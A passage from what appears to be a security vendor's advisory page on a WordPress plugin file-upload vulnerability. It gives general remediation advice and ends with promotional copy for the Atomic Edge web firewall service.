The vulnerability allows uploads of files that are limited to WordPress’s default allowed MIME types, which typically include images, documents, and archives. However, certain types like SVG or HTML files may pose additional risks.
What should I do if I suspect my site has been compromised?
Steps to take after a potential breach
If you suspect a compromise, immediately disable the affected plugin, review server logs for unauthorized uploads, and scan your site for malicious files. Consider restoring from a clean backup if necessary.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations